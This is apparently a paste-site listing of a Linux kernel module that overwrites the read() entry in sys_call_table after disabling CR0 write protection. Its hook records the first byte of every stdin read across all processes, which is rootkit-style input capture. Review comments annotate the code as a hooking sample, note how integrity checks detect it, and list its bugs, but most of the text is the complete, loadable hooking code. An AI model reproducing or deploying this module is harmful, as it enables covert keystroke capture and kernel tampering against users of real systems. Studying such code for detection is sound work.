
Untitled

a guest
Aug 30th, 2018
  1. #include <linux/module.h>
  2. #include <linux/kernel.h>
  3. #include <linux/init.h>
  4. #include <linux/slab.h>
  5. #include <linux/string.h>
  6. #include <linux/syscalls.h>
  7. #include <linux/version.h>
  8. #include <linux/unistd.h>
  9.  
  10. #include <linux/time.h>
  11. #include <linux/preempt.h>
  12.  
  13. #include <asm/uaccess.h>
  14. #include <asm/paravirt.h>
  15. #include <asm-generic/bug.h>
  16. #include <asm/segment.h>
  17.  
  /*
   * NOTE(review): read as a whole, this listing is a loadable kernel module
   * that replaces the sys_call_table entry for read() with its own function
   * and keeps bytes read from fd 0 in a module-global buffer. Treat it as a
   * sample of syscall-table hooking: integrity checks look for exactly this
   * by comparing table entries against the kernel's own text range.
   */

  /* Capacity in bytes of debug_buffer, the module-global capture buffer. */
  #define BUFFER_SIZE 512

  /* Prefix for every log line; also used as the module description below. */
  #define MODULE_NAME "hacked_read"

  /*
   * Logging wrappers around pr_info/pr_err/pr_warn that prepend MODULE_NAME.
   * NOTE(review): dbg() tests an identifier `debug` that is not declared in
   * this listing; dbg() is never expanded here, so the missing name does not
   * surface at compile time.
   */
  #define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
  #define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
  #define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
  #define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )

  /* Module metadata; author and mail address are placeholders from the paste. */
  MODULE_DESCRIPTION( MODULE_NAME );
  MODULE_VERSION( "0.1" );
  MODULE_LICENSE( "GPL" );
  MODULE_AUTHOR( "module author <mail@domain.com>" );

  /* NUL-terminated accumulator that hacked_read_test() appends to for fd 0. */
  static char debug_buffer[ BUFFER_SIZE ];
  /*
   * Saved copy of sct[ __NR_read ], set in hacked_read_init() and written back
   * in hacked_read_exit().
   * NOTE(review): the second parameter carries no __user annotation, so sparse
   * cannot flag the direct dereference made in hacked_read_test().
   */
  unsigned long ( *original_read ) ( unsigned int, char *, size_t );
  /* Address of sys_call_table as returned by find_sym(); never checked for NULL. */
  void **sct;
  /*
   * Number of calls seen with fd == 0.
   * NOTE(review): updated without any lock or atomic in this listing, and, like
   * original_read and sct, not static, so the name lands in the kernel's
   * global namespace.
   */
  unsigned long icounter = 0;
  36.  
  /*
   * Disable interrupts on the executing CPU and clear bit 16 of CR0 (the
   * x86 write-protect bit, WP), so that ring-0 stores to read-only mapped
   * pages no longer fault. hacked_read_init()/hacked_read_exit() call this
   * immediately before writing into sys_call_table.
   *
   * Interrupts stay disabled on return; the matching rw_disable() issues sti.
   *
   * NOTE(review): this is basic asm with no operand or clobber list, so the
   * compiler is not told that flags or memory ordering are affected. CR0 and
   * cli are per-CPU: only the CPU running this code has WP cleared.
   * NOTE(review): a module clearing CR0.WP is a strong integrity-violation
   * signal; it is the step that defeats read-only protection of kernel data.
   */
  static inline void rw_enable( void ) {
      asm volatile ( "cli \n"                              // mask interrupts on this CPU
                     "pushq %rax \n"                       // preserve rax by hand (no clobber list)
                     "movq %cr0, %rax \n"                  // read current CR0
                     "andq $0xfffffffffffeffff, %rax \n"   // clear bit 16 (WP), keep all other bits
                     "movq %rax, %cr0 \n"                  // write CR0 back with WP off
                     "popq %rax " );                       // restore rax
  }
  45.  
  /*
   * Read the CR0 control register of the executing CPU.
   *
   * Returns the raw 64-bit CR0 value. The callers in this file take the
   * snapshot before rw_enable() and hand it to rw_disable() afterwards, so
   * the original WP state is what gets restored.
   */
  static inline uint64_t getcr0(void) {
      register uint64_t ret = 0;
      asm volatile (
          "movq %%cr0, %0\n"   // copy CR0 into the output register
          :"=r"(ret)
      );
      return ret;
  }
  54.  
  /*
   * Write val into CR0 and re-enable interrupts.
   *
   * val: CR0 value to load; the callers pass the snapshot taken by getcr0()
   *      before rw_enable(), which puts the WP bit back to its prior state.
   *
   * NOTE(review): sti is unconditional. The interrupt state that existed
   * before rw_enable() is not saved anywhere, so a caller that entered with
   * interrupts already disabled would leave with them enabled.
   */
  static inline void rw_disable( register uint64_t val ) {
      asm volatile(
          "movq %0, %%cr0\n"   // restore the saved CR0 (including WP)
          "sti "               // unmask interrupts on this CPU
          :
          :"r"(val)
      );
  }
  63.  
  /*
   * Resolve a kernel symbol name to its address by walking the symbol table
   * with kallsyms_on_each_symbol().
   *
   * sym: NUL-terminated symbol name to look for.
   *
   * Returns the address stored in faddr, cast to void *.
   *
   * NOTE(review): faddr is static and is never reset at the start of a call.
   * If the walk finds no match, the function returns whatever an earlier
   * successful lookup left there, or 0 (NULL) on the first call. Callers in
   * this listing do not check the result.
   */
  static void* find_sym( const char *sym ) {
      static unsigned long faddr = 0; // static so the nested callback can write it; persists across calls
      // ----------- nested functions are a GCC extension ---------
      // Callback invoked per symbol: `data` is the wanted name passed through
      // below; the inner `sym` parameter shadows the outer one and holds the
      // name of the symbol currently visited.
      int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
          if( 0 == strcmp( (char*)data, sym ) ) {
              faddr = addr;
              return 1; // non-zero return; presumably stops the walk, confirm against the kernel's kallsyms code
          } else return 0;
      };// --------------------------------------------------------
      kallsyms_on_each_symbol( symb_fn, (void*)sym );
      return (void*)faddr;
  }
  76.  
  /*
   * Replacement installed into sct[ __NR_read ] by hacked_read_init().
   *
   * fd, buf, count: forwarded unchanged to original_read().
   *
   * Calls on any descriptor other than 0 are passed straight through. For
   * fd 0 the function counts the call, logs the counter and the buffer
   * length on every 1000th call, runs the original handler, then appends at
   * most one character from buf to debug_buffer. Once the buffer is longer
   * than BUFFER_SIZE - 100 it is truncated to the empty string.
   *
   * Returns whatever original_read() returned.
   *
   * NOTE(review): because the table entry is global, this sees fd 0 of every
   * process, i.e. it records the first byte of each stdin read system-wide
   * (interactive shells, sshd sessions). That is input capture, even though
   * this listing only logs the buffer length and never the contents.
   * NOTE(review): buf is presumably the caller's user-space pointer. It is
   * dereferenced directly by strncat() with no uaccess helper, which is
   * unsafe in kernel context and can fault.
   * NOTE(review): strncat() runs whatever r is, so after an error or a
   * zero-byte read it copies stale contents of buf.
   * NOTE(review): "%ld" is used for an unsigned long and for the size_t
   * returned by strlen(); the specifiers do not match the argument types.
   * NOTE(review): icounter and debug_buffer are shared by all callers and no
   * lock is taken here.
   */
  unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
      unsigned long r = 1; // initial value is never used; overwritten below
      if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
          return original_read( fd, buf, count );
      } else {
          icounter++;
          if ( icounter % 1000 == 0 ) {
              info( "test2 icounter = %ld\n", icounter );
              info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
          }
          r = original_read( fd, buf, count );
          strncat( debug_buffer, buf, 1 ); // append buf[0] (nothing if it is NUL) and re-terminate
          if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 ) // 100-byte margin below capacity
              debug_buffer[0] = '\0';
          return r;
      }
  }
  94.  
  /*
   * Module entry point: resolve sys_call_table, remember the current read
   * handler, and overwrite the table slot with hacked_read_test().
   *
   * The store into the table is bracketed by rw_enable()/rw_disable(), i.e.
   * it happens with CR0.WP cleared and interrupts off on this CPU, and the
   * CR0 value captured beforehand is restored afterwards.
   *
   * Returns 0 unconditionally.
   *
   * NOTE(review): the result of find_sym() is not checked. If the symbol is
   * not found, sct is NULL and sct[ __NR_read ] dereferences it in kernel
   * context.
   * NOTE(review): after this runs, sct[ __NR_read ] points into module memory
   * rather than kernel text; that mismatch is what syscall-table integrity
   * checks report.
   */
  int hacked_read_init( void ) {
      register uint64_t cr0;
      info( "Module was loaded\n" );
      sct = find_sym( "sys_call_table" );
      original_read = (void *)sct[ __NR_read ]; // keep the genuine handler for pass-through and unload
      cr0 = getcr0();                           // snapshot CR0 before WP is cleared
      rw_enable();
      sct[ __NR_read ] = hacked_read_test;      // the actual hook installation
      rw_disable( cr0 );
      return 0;
  }
  106.  
  /*
   * Module exit point: write the saved original_read pointer back into
   * sct[ __NR_read ], using the same CR0 snapshot / rw_enable() /
   * rw_disable() sequence as hacked_read_init().
   *
   * NOTE(review): nothing here waits for callers that are still inside
   * hacked_read_test(), for example a process blocked in original_read() on
   * stdin. Such a caller would return into module text after it has been
   * unloaded.
   */
  void hacked_read_exit( void ) {
      register uint64_t cr0;
      info( "Module was unloaded\n" );
      cr0 = getcr0();                       // snapshot CR0 before WP is cleared
      rw_enable();
      sct[ __NR_read ] = original_read;     // remove the hook
      rw_disable( cr0 );
  }
  115.  
  /* Register the load and unload handlers: the hook is installed on insmod and removed on rmmod. */
  module_init( hacked_read_init );
  module_exit( hacked_read_exit );